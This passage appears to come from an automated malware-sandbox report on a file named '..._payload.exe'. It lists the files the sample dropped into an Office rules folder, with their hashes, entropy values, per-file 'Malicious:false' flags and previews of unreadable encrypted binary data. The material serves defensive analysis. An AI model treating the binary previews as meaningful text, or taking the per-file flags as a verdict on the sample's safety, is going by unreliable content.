                                                                                                                                                                      Preview:<?xml6.4`...........H-..c.`.......L.L.Hl." d...7......kj.(o.2.t.q"...w.8.zn.j.[Z.Y.qh.s}J..S_..g..Z...$.X..Y.....^...B..v9.._CC.C.IO;..&..y.......`....c..7..m...0"z2....&4...+W].l...;.s.ki}X...!.w.'r..-.^\.)....F....R.{...i..\S....J..9.%.^.. .Y.H.I...4.%......h...,.%.v...*#Q....1..v.....e)&..~..d....(.m.K.E.[.q.....i.jk.....T..l...:...PJ.+%.W.H..F.x@.0.g.$..W./...q..I...;...t...c...Q=..q.6..+.\0.xLG.z....[_..s..l.f..I.Kz\6.P^...5..@.$*R....$s..MvHE.....(......N.......l2 +...OpP..k...|j.y\B..m......OQ..<`~.......%.D.:^.%n.o.....2k.t~~...md.../.sN...)".I...E.wtr....e[2 ......,.C.r...B......(...-. ............?$.Z^?..~...o.._.....N....*.H..$Q........V%R5...h.V..].....{.o.......o...4v.h.>..B......lm..f........cja.q..-[...ju.!.]..W....w c.|.j..;.4.|... [......8.....H...b..tc.$.....;...b5.Y}...`.`A.!.^..n(....).f...M.y...Bl....).r....o......<.vc...aL.bq........K.9/.<L..rL2..S"....y..q....r5-..Z..S$"+.}\..N...F...f_h6..^S......i.L.:..HH....D.D.....q.L.&

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10819v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):8769
                                                                                                                                                                      Entropy (8bit):7.980388575248469
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:192:quUaGIrTm0Ec8pU9CTXpnmo15rgxmb4CPTt53yKXw4jCnffDvx:qurxOJc8yUp3rQmb4CxtyKg4mnn7x
                                                                                                                                                                      MD5:F693B9ACBDF7CFD83507BEB14B2404D8
                                                                                                                                                                      SHA1:4A6218206A81A41EBA45103C968C38CB854A6D09
                                                                                                                                                                      SHA-256:AD434AF4334EABD5240C7D2142F48E79FB8236364D648ACFC886A63AC9CCDDA5
                                                                                                                                                                      SHA-512:63A1337B26F3721159A050A5CD354E0DE91AA66F52821E96B26D76556837F5ABE4837A775F2E3C0F009DF358953DE1433E4915D90DB5FC987F10A424B3DB36B8
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml^.w.....p.{..v....7.1,.S.w....P....S...Z.\.H3....Q...y.H6T..@..]w.S.J....c7.V(.K)>'G..s;cf..={.....@...B}.-.+iI2..|.vB+.'...x5..c.#.`.M..cA....M.gg.9xo.~...._.F....&......?0..W...s...W.u...m..(X...;A..+&Q.X..'2..I[..F3*5v......o....~...E.j.Q.f.....b...%|l\.M..B.f.uk~....u.a.FZ...?M..X.j..JF.....YF..L}...+4|......).l,.[..1.^.......6H.`......u6..4..U....7.-..m....Q.f.k-|.8........!c.......Wg.....n#&.1..n.F.Ge..`...76.:.I..o.$..!...d.A.M .. <.kg.$x....g..3\Cru...z...5l....co.p.:j.;.h.......:m'k...={..iA....:a.......Z..O.@.Z.a....F.H..!.zNj.._.~.....k..~.G|".p......!58..,Yq.....r2.m.wfWc.2E..YX.X..._.".'..+...8#1.bkI...![....~.t......... E..T.0...Z.).g+.0.....U.ZX.H.... ..%4.........#.A.........qn..4..X.>.#.%.m0D....a^.i.N.Wb....U3?p..;8......|...3.8.......R.?">...Zy.o..rA.I0..K.Q.]..6.0.$..,..9..."...4...4.i....6.wn..7.E..U...C>o..L@.d|y..g..dk.R.T......m..xE..=xJ(.g.....<.Q."....u...Q..m..z..Q....l.y.,0.[...w...ay/Im.|...NJ.'..i*....`.~.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10820v3.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):5842
                                                                                                                                                                      Entropy (8bit):7.972044999048718
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:ryGOjGC4k+wz7742JcrSz/Fg5T4MLh2qlVXFfexN/BD9jSeVai5DzYunok2eg:jO6C45wf7JcuLcTHcEzfer/zW9M6kFg
                                                                                                                                                                      MD5:08B0CC856CEFD811EED062DA048EB75F
                                                                                                                                                                      SHA1:52D39681AF5CE5286DBB9192632B8F6BAE7BC7D0
                                                                                                                                                                      SHA-256:8C53483180E7217AC402B512E4245217B8756A969167B7611C6ABA2FCC42FF14
                                                                                                                                                                      SHA-512:DA9D536D1E5FA027F03354E9285A4FA04F9B44154183F97592E1981F6894459FF3A7D18A0DD72C7171789AE6EC4074B81F97C8A7FFD2EFCBA251AD947B25C0AB
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml/d.....@.G?..-.... x(`.$Q.......v....t&...YnZ...<@.9l...'.\*....Y.......O?;Z.#......$>..".q.S....c5+...t...d.D.P.........$.'.+. .T"D.!..b.....&F....}......1.5.k...}..S..9V...u..VDS......l.Y\..I.%.u..1.#M.h%^..t...@QQ..."..Y7s6......?..8...3.m..qK..s..0.*.%..y..F..a.M..Ja.U1M.>k...B...z..r..I...&.My.K..\H.B..89X;.B.......n/,...F;.O....+..<..rn.ncP..0y...Q..4;?...M..D.+..N.}A...........[@.}.FV^s.q.;q...^b..]........v.h....&.9...R(.[..v...Y...b=....W..cv.U..!#.......t:H.Q..$....q....7_s}..%..u`..N.M....*!@~8e..`..3..^..........@.h@.B....|.ek.L&w.#....T.M`.....:.N...iX...P\."...^|....u...5.M:v:}/X.....^.?.{.S.W."..lU..wf.......66...0.....w..2D8....3.r.1...6~n...dI..o#>....a*..,..P..Ih&..n..r...z...O.o...d$..m....._.L).0R...}......t.O$B=;0}U{.+..c.5..Qz1.Zt....@L..iI+r9f.f......L.w&BG....=.9..&G.%$.........?.uI.....D.@.....:..,L..A!......KI.m....s.b..2 ....?)...V.t...{&..;..!..eiK.......&Rl.m....>g........hn...~8:U.-t.6..'3T.......I

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10821v3.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):4787
                                                                                                                                                                      Entropy (8bit):7.972847404721127
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:YEKae3otcOIpXH4JETxR0dDKV7X0O/VbtMpTRu28xjVE:qYS/4yTx2DKVQOdb2pTRuVxjVE
                                                                                                                                                                      MD5:45948A2DA6C9C89F7832C60461E08637
                                                                                                                                                                      SHA1:323A5B4154FC8209D15B812623A8CF26382A7F56
                                                                                                                                                                      SHA-256:E8259416A3DFC5E17C36F63919B8A087BB9CA78036D14039EE75445E1A8FC32B
                                                                                                                                                                      SHA-512:452BF83AFD1F309320C2C49F3637659E63566361C5D0D1BE9E1B6AFFD200844ED23D231A683173D1D3CD647A94D060B9C87EBA32A18DB09C29A00BA0CA9A015F
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.&2$....z..g..N.]....~...G...(..........j|...(=K.!...N..+.3..$E....F.aO...-wg.A.......V...:..mh$'...m6.7r{...f...m..c..2./../C.......l....(......D..........">..X......>....6.e...."x%9.m.c.C`T.......m..KD|<\rU...).S.q.U.G...".t......)..Y........g..QN.m....x.....A_.U..._...*.?......y"W,.......<.P(>......&U.cA..y.?.m.......?iI.#....1E._..g..yU.'.....S8.I(+.V..Z...Z..<D&N.cG......#....tTr.P.Y(.o.d'[Y....nTt..I..c,fa...$...|x..w..lFh..5.S.su..I...kEt..Hy.N.{..n~.....p ................62..p..@.J\3@.A.a...%..`....{......UJ.....m.B....m..q..;.aks....nN.d._[...].<.q..lU.....{...$%...k.......*.kb..y.bL...?.1.S.Y$..\b.ez>EL....Nv.ny.N.5.9.>.....x..H.$ng.6...5.e...j.].....T.......C.6URIt.....~`_..p..4...-)RB~.#|z.d..\.3. ?.,....jJL.d.t}...4...e.MJ..... .EB.J.....L..O!D]..o...mMd..i.L<...^t........{....._.nk.....|..Yz.=Gly-4d.2..i.q..V{.?.h.!y."......P.C.BZ...N.@.6>!....0..P..(..>...._{...._..q....d..C.:>\fb..U.=wu.R...k.v..h..,.....viR...

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10822v2.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):4786
                                                                                                                                                                      Entropy (8bit):7.961102264143957
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:96:XuTO50BY3TQ7k6mJ/jEhAhhneUygEJIKPLDLvU4I3k+u6fV/vymi:+y5wY3TMh8tnygEJHPLvvUP0+/Jve
                                                                                                                                                                      MD5:F1EEBD31B474C9E06AA200D2BE9BF04A
                                                                                                                                                                      SHA1:5480E947E3083B1D299072263091D8563C00F28C
                                                                                                                                                                      SHA-256:96E22087C6A49F9DBD3DF09F430D0F8FAB42062FFC362572B5BCECAF9B5A2CE1
                                                                                                                                                                      SHA-512:D51020D3797BE764CF4E7D7D6F4F63C365F3CEFD13A20F21B3FD3A45DA580C20DA28B605B484CE16CB7D02D31DDBB4B0AC2BE2EFF967CFE78472CDA38B750E3B
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml)...q....}......C...(...T....J.fL..T#.cF.4_#...c;.....(..)...C.q...Y..$..k.........ms.x2.&...S.W>l..58a~83..L....S.....H....{.pz'<.....].O..Gv...b...^..L..J*.sZ.^a.Z.N.d..5..X{']...L)<....m!.I7...M.A.D2.0.$W:....3w\.\YX.=.[R&....a,ZDO..).YH5...(.......Ce......j...........%..~g;i+.i.JV&.....P0h.fh.(vQ..vhs.......-[...[.m|!W...4.v....-.N2.%O.J~...o..].)..Qp.sN8!.*o.t.*.F..j,......m.u.<.......@.S.?.2..L....He.~Ct.58._P..........".6....4...PHS.....Uq..5g~.....X...h......A..m.....34.C<........D.H.....Ru.t..?...........bH.Q.<G*A........^>...g...^./..._.....F...&.......e.xf."..S...k.@...3+M...G&.:..&....qv3!....o.M..I..D`...S.c.U...B.......NevJm+.<6y...)...Rs..k0.P.....(....(h..V..U.~..v..Y.!w3.....k.P..!.4.)...._..K^....I..M..C..B.K..5.V:.-.=..".y..zQ.....3.&Bs.h.n...}...S.B...q.C*.%'."7-I...TN.A..!.t..`.H......g....8...#A.....W.t.C.a.W=..[.-.......zC(.U...`...q....[..B...p.h......c.....\...q.......w.@..m,.:.}...#......1...._.bq.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10829v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):3030
                                                                                                                                                                      Entropy (8bit):7.940675774458894
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:PRkZX0h5vCMMLd+rrpE3fuM/KAEVOhchu72UttHdd6iv1wqJmGzXI0ZdbD:P+OhByd+3yRKAEohchu72oC0DmWXD
                                                                                                                                                                      MD5:BB2ED1CABD708B6A4C87CE4284382E7A
                                                                                                                                                                      SHA1:D46EE65B365295A918C94078A60AA99BDF8E3A7F
                                                                                                                                                                      SHA-256:FB4CB215CEBD736FE14CC3AEB5F6635FE5D4271D4995C0507E092EB665247B20
                                                                                                                                                                      SHA-512:45F7FFE1C355DCB2568EFAD7A5AE9A5E571FEEBBC37759A4EC0283719DE8D76922D5C02033804B378AB632F97DFFCAC937B0021ABFDE5C199606C7E2018825EC
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.5.....J~..U.yCgS..:.5.k.|............Q(.2...(.....g.L.5..5(h..??U7&.O.(.".m..Wc.Y...1=..N..eT...E.x.KK4....h...@.;}.+o.{.=..wl.F.}....?0..p..`.........t..l..Q......s...*....vw..5 ..&...*..eq..........U..L.=Q.F.P.DJ..Y.....yc.:.=.[D.......d7O.!...Z..%%)..\.f.A.......lu@....R..J..#....%F...x.'n..t[.[x9.!g:R.kF\......0&...=D...y..N..i......W....va....N.0.....h..R...G|..UD...{.".f.....M.6....tx'hKQ..2.a.e..c....&1...8...g..93..'9..1v........B......]n{....7o.0...P}l..>B.E...B"uG.**..&...Z..q.!n.F...-.I/..O..\.D.C..-......+..,..I...%...k..X-&.z'-..../...u.p..!..1.Gr...J}.d..F...7.}uY.........5@.....M......~m,..@...*..Z.u<(..)...3.Z...M......J... z.. ....0....].6..#...........gA_..1.{^...=.....FQ...5vW%...RJ.....p......W..k......L.Q...Y..7.d../..c....T=.A.E.00.;.....?.<"..w..w...7.Y.V.)......Q...^1..).P.w..?...M.,Gr]f.)7.?.9.B`|.l^....;.<..v..^F.@.B.......R.x. ...*..[.g.H,m.k|....B0......g...z..n.+...z..&v....l.j..O..|$..{..

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10879v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):789
                                                                                                                                                                      Entropy (8bit):7.687059381088303
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:a2NfgEnLmsmtp0ApLNW5a4nrVYaMMDsJ79/1so1xc2bD:a21gEnSs2CApLNW5nrVYxjDD
                                                                                                                                                                      MD5:8874C401E65D228B48BAB37CB4CFE68F
                                                                                                                                                                      SHA1:7813C0D8850D5B8D2B9274C70B122EDB21680CD1
                                                                                                                                                                      SHA-256:35E2E2A7645CA1CE8B9CDF2C31AC7BAEA5F4591E1CFF2FFD7E7F94371EB97A43
                                                                                                                                                                      SHA-512:A02161F07A44D62CCC235B1340EA46992DA30BE2CED4E52EB00BF1413992D6265AFE4D4E958F96D145E54CE27B8C9F32E143F3110AC6D3A355359D974AD3698D
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmlk..s...o...'wJ...g.At......m......Vd...|...Ou..e.Z..[..f..T('._l..J.. .>B.......1.1.=.....@R.:..%sT#.)<..NY-...N.A..q>u.....I...B.x3...G..E@.....6.....NO1...Tcr..;......u.."rk8*R.7.w...W..-A..7.sf..;@s......q"...k..8..$d.....'=$.b.2...2P..v:JT.7~.._...7..e..!....Cl..l?..>..k....S.j..E2....B(x..=|dwW.5.R.!:HK..Z..@._E.....ar4....1..0...2..N...L.i....!I...O...%..x[.1...."}M.7...9...ABD./.aR-.3...w... 4i.n2..]..-..'..(.~..0o...'.{.ba'.(...x...)...Bc....r.}.\.b....[.A...'..c\.m..L`%....n!....4b3.......>$9..^...%..S.c.O..>..c.7zbB..g]T.u.-.......E....6.z.\..........xSg.Nc?.7..z.!...Go.J...l.J.<;.).V4".......K........+..B..!...qi.-.L..qtHXqy.5Y.em........[mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10880v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):3017
                                                                                                                                                                      Entropy (8bit):7.92253490325383
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:Pci1K+flhsQq5mnftyDko+JU1cA57C1N25+PSiwZZMimlL+t0/zQu6PAuD07KuLf:hAolhJI2a7R1F7CX2APS7ZW5ZsLAuD0b
                                                                                                                                                                      MD5:3D71AA670F73FBDA6F6282512EC40477
                                                                                                                                                                      SHA1:B9BF2676B0D782DAF2A137AC434D457C6F4BBA61
                                                                                                                                                                      SHA-256:6DE5181BEAC6D7BAE898A1E7ABDA0891C7C1F60F04AC7D77046DF7045C48A022
                                                                                                                                                                      SHA-512:23457F3E856DC3109B4E4F73162499128ADB5A6B7BC027F571959293900BC7C2D400685E396F19B8326BF88A3CAC4FE8D06F0406322E115B48BA3716FF649A1E
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml;..e.V.8%.U.5..n..4..jf'b}....C.".6...}.a.8..1"......B..L\..,. ..o..!.zPa......-4.]{a.\U.........o.$.k....d.M\:.i.....f....2..K..h.)h`.L..B.y..j`..Kb.dl....../n.V.t"{&V...s.w?.4.k..i...x..........R........1..|J.{[...;9...|....Sc......k..Y....j...a)......b...U-t.....!...Ws..B.Q0.Y.v.y...%j.M.[.n.JDa..Z.-|......D7K.@......._..,...OG.K%..gS.V..SSow.*e..g+...T3v.9...9ch6...E.g..?T\.;....E.=..Y.k.;.P.}.....\g.B%..R=d=..vJG.n.P.6..4*.`Y..UT.1.c......B...{e.M.w.._.......d......a.r^...... .mP..q.K.$...F..s,.eBF=.......\R.6.V...I.j`!.T.G|.f#.......-AIn..w.@...YQ...h....].+..=...].M.........]VM.4..g..qzGx<}.^..!h.`......C.F...};n......8BHm.`N+..!.nP4.....#9+rL.@..0(.^RP{...0.z.:..~>........^.e].N..e.n.%.p......A"r7....c.91....ZD....6.TV..:....2K;.s..B`..U....+...\\...qA!....}..w..?M....m....vh..pej..f%....|......%|U..^f..&...Z".JEj..\>H.E...8)Z.Rt..!>.H@.1..^<|o5..4l...........`@..FK....\......uKsC_{(g..5E.=o.....'...L..pU...az...o..bH6.7.Ml......

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10881v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):823
                                                                                                                                                                      Entropy (8bit):7.732986914287021
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:u6/jA00L2jEPIGBGiMuP8Sz24e/l/lCn62bD:L/cB2VGTPxz1eN/UnxD
                                                                                                                                                                      MD5:AA3F78FA587A27B51436B15613A46D12
                                                                                                                                                                      SHA1:0512EC60D625BE265AF185735EE0A6C07817FCAB
                                                                                                                                                                      SHA-256:56D5AE6B21089FA919B4706A3E5D5449D0EF58921E7F99267E3AF79A97871D7E
                                                                                                                                                                      SHA-512:ACA752F31FC25F1B96D5DE0BAD3AF31D7087E758DA3042B389D2ADD4B10CC2ECA3CDD18246A6891D299CEF16043F2B952022EC9AFE6446E5208DDA5484E1BD48
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..tK8.X...c.t...Ji...C...y......m|..<.0..."p...DG[fa......%......O....a..k......{......3x.+.qG..2.o.# .q/U.7C..e.z,G.m:t.D.b.J..n80M..bH.. ..K.\.M.j..=87%.........$..A.U.+.[<..;.n./.Li"..y..j.{N....-cO:..>M..^....U..?..%.W.L.x.w...Z....I.0...j....0i[.[^...........UG.r.7L.R.....U{.}E......$...._......U...H.Z.YP...Q...A.T.=.....W%.t.O..$......B...U^..T.=z...`.....zP..6..W...6 ......@.s...%B......."y].A&.;eMeE.W$......x.u.....mYn...&V@........I;.(IG......7...e......E.2.E}../....*......0.....@....X.><.._aBJ.H.....y..O.24b)..Ts.Z20........5...#.w#4E.e.-.....W....a..a.n..)=.o..C...&..C....r.$..|...PQk....YW...0...|......8.A....7........{....N*(....V......Ya..]*|...v......2.-....q.D.c.f.%..?.`2*=..HbLmMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E07-BE82-0EC5B14B4DF5}

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10882v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):3017
                                                                                                                                                                      Entropy (8bit):7.947448259019598
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:48:i3qawW9trCms2W2WnzWxhf65lqmkIvzad5OtkD27V1En1G/ur2cskF+6D:O5MmI9zgfOlqmkIvmCtkC7g1PK2
                                                                                                                                                                      MD5:BD4307730AD238CFE0BD7B1FA0C76ACE
                                                                                                                                                                      SHA1:158EBEECFAD0BB77604295E2DED3A1FB04FB54DF
                                                                                                                                                                      SHA-256:2EC4F769DCD771E17A43F01D64BDFD45439D150C18547F8962B4210FA5A46B92
                                                                                                                                                                      SHA-512:7CC5FC8316EC7511922F1FA15575DE0962BD48426A149DF2343C1E1412B225262CE8ED3087B759F5D176742F39AEFC5DEEC2D1CB08CBE0F38CC1289E1BFE81D7
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml..8.B...P...QQ...EN9.b7.9I_.I...n.v..!..M.L.$..F.*.|....!..yr..).*J........(W..Ii.b*)....Eg.%..v.|..V.C.:..f......BXL_X..%.G...KG."OanXvhgL....im5.$..c..F+<i.......<..I...X\..}./a.(M..RmKE..y.....ek...-.Bl.^..9.....T..9..@i|...Q.Jg..ln+....h..j.O<.3...."J.....OB......WP..<..Qe....Ru.(.......O4:.-.......:..q.Z.8hR0;.8.i....Xb....+..."K&F.Q..$m....$...~B1....4.... @`...........=.@.P.)..%~*..w.f..O#.=(-'c...~(...j/9..?'.$...i.;+.BT.H...!.#\a.......>..y.J.....?.[..W..Kd..(.d...?.F.b.K9%.....}....-sqf.m......tdG..Y..R.zz......[.z.....G.0...$.];.7q..5..q..~QBk......R.T0r.....N{* .......r..).V.....q.{;^.,^dID..uY.......s./..h..#-*..o...H.`......Z....I...........e...}3..5H.<.T......2.....nlv.....$W._..&9h;.A.<....,..`....h....Tk.......@.4.5HS...h.!.....57A..A...+....{.....U.........9*m......A .@6......H.t.7^..u..?....P.3....&@b8.Y.in.S..,Q.lY....9-..(..9-D...~.....O..hqx.(.b....OB....5.D.l.z].5.v.......3f...a..z-.TDY..._.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10902v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1021
                                                                                                                                                                      Entropy (8bit):7.786447062198549
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:p40+6rGSc3VjSdeafQhaatrGB1V/h7ckpSleU3Ma8XqZg2bD:p40FGNNK04Kruv57caSOaAqlD
                                                                                                                                                                      MD5:0E46BEF45E44F32F936822483F9EAAD7
                                                                                                                                                                      SHA1:F9828765B4B1B6182A1D299373313FED52EE8D4E
                                                                                                                                                                      SHA-256:E2204409F76F707E51DF62E7EDCC957E4432AE108B5E7649E34295E231C56BB5
                                                                                                                                                                      SHA-512:C96CE49BA39205BF381178CF3D60899410BF0586E62EA8229700D5A736BF52BF949EC95D8AF90E7340464F4C6B5589C049A08E8FB11772897E193875EC236684
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xmll..a....5N]?"......|...:...c..|..tU{.+.qO+..W..%.}q.^pM...2.5./.<...6.......4..A..66..,...{k..w..{n..f.n..i..C.../.....5y|.f.).\.....d...tN._..Y!^....>Ays...;..u.8...lD........./.c p{....$.Mt......,&...'..*...m{.i....i2.W?...h..PW.4..3.>.Pk....A.d..9..G..p.)!.d.....L..... .<VbTA.z`.}YB.p......k.f.j..>~.....;...1..B..w{......w..w`dN.p..EB`.q.X.[.N.{i.."U..e............pdy...Uz-.WY8h.E..BP ...".<.!.>..r@w^e..:.A5E.K..=)..f....,n.......J..n....2.U..P.U[k...w]...*..3...[#Aj=}_..nS....Q....+.*.7...d.VV...&.""E.....}x.h...~..H.^~...7.5l..@...i...P...M>...VP..-}r...t.<w1}./.H.Y|.<.....J._..N...i..oV..... W..Q~.C.+...4..u..Mc..b.:.r..m}...A.C8.".._k..H..&..S....u.w.......Ir.8......;........a....m..W.....]...4[..J.Nls..C..0....d..}..J..E./......4.s.E.t.z\U.t..."|S...M.E6.9.....c...!(.i..>..T..?=D\g..cu...).W;h..mgzP.F....R4.....x.T....=.py8..%..$...eG.|...i..{..)..4o...I.,(.......#.7(....S.mMsRxMUuXypapZbGOAfxD9pczHmW8zVRP7Pgjwt1{36A698B9-D67C-4E

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10906v1.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):1398
                                                                                                                                                                      Entropy (8bit):7.854034799186888
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:iPLUx0OLh71E1IRzubNOzzHc65fsTZG1wJPPEEnoh7Z4RvNe+XOnKy2bD:mU7abCHcwUTMukEoiNaKD
                                                                                                                                                                      MD5:D7D068BFC569D39FECB6276B4DD9FFC2
                                                                                                                                                                      SHA1:4B0A68E63366A02F3BD917BFBB3C97E69BC8BE32
                                                                                                                                                                      SHA-256:D5BC8D2A79A7F522E995715DBB0F1132DF03D6D11824B652695AA0918922F3BB
                                                                                                                                                                      SHA-512:144C6D6657F93A81290E16591D870C66C96A390FEB27F09997E64CEB7AD48CF9286BE2A3634A95C467849FD895E5A78A51081809EA95EE886E607D03684CAE7A
                                                                                                                                                                      Malicious:false
                                                                                                                                                                      Preview:<?xml.p{..G...9.fu...#..Fm..f..v|I.:._.EJ.[T.m......E_?.,...?36...f<....p...............8.{\q.....b..;&.#v..J.gC}.H...E......Bge.>..Q..Y..T".y..?.....0W.nc....H.....J~VQ>.#..B2.a.............<....N(.,".i.S.Q....M|...7vy..v.Y3.0.3..D3..TJ...Q}..[.BG$...F...R.5.a....E5.1+.5...7.!)........CS2k......S{*..D([pd,.D_&.8F.?F.f.$.....a4P7...........d$.".n.i..&...|.u.. .c..k.yoH...b,....EjD.0.q}.?j.q...V.W.O....Y......b.....T....+..Q. ...U&.a..=...=/...V_..o..#...........Y:D....o6Y,.......A.......G..N.6.#.& p.:....L.Dv...^\......~.n........T."..C...;..g4.@I.?.Ms|.#.x......Y......Z.z..W.:woW.Y.....,.p>o.D.^.).e.....4....Jfs3.:z..}...O...L......%.W..t...Lf.o.4B..g...c..=>i..O.e......[..C..>.E}...C..h.j....n.:.......r.9.N[=.&...P*%|.P#m...... ..95...+V..NM...B.OD:}H.........G?..u../..*Dte...+<.{..z.......F..(../.7`.2.d...S..L.>..A.k......NV.m...o>..$$......^..*Y.p.T.1C0.q.....Fn.../..n..&..}.(S.........:..)\..t.D...V.Id.eP..."Xa..?,o.t5.Iv.

                                                                                                                                                                      C:\Users\user\AppData\Local\Microsoft\Office\16.0\officesetup.exe_Rules\rule10907v0.xml

                                                                                                                                                                      Download File
                                                                                                                                                                      Process:C:\Users\user\Desktop\9dfb6b41c90732c9206ef6f65a941b1061126ead69e3715d79519196dad5899c_payload.exe
                                                                                                                                                                      File Type:data
                                                                                                                                                                      Category:dropped
                                                                                                                                                                      Size (bytes):937
                                                                                                                                                                      Entropy (8bit):7.770511184569466
                                                                                                                                                                      Encrypted:false
                                                                                                                                                                      SSDEEP:24:u5I6bTpcCM6EwHLgWybcITEsFXuubtzRD4Hj1vHrwasQVo2bD:ua6bdcC6qpQESDRp4HjJhvVbD
                                                                                                                                                                      MD5:BBACABCE4D20B52898A622A2A6E132A9
                                                                                                                                                                      SHA1:6260373EE51B8AF4A8A555727B13110F6401C023
                                                                                                                                                                      SHA-256:CFD30CFEE387DEAF304E013023425BFA7582F552202E969A22C70F8EC921484A
                                                                                                                                                                      SHA-512:95FD1341E310E5DAFFAD76E8B6CFD5956AACF4DE1CFF7C3A573D234C5B5C2318D41ABB189180A811449FE55584B73526874721CF8696D4E87CF50043AB8E30DF
                                                                                                                                                                      Malicious:false
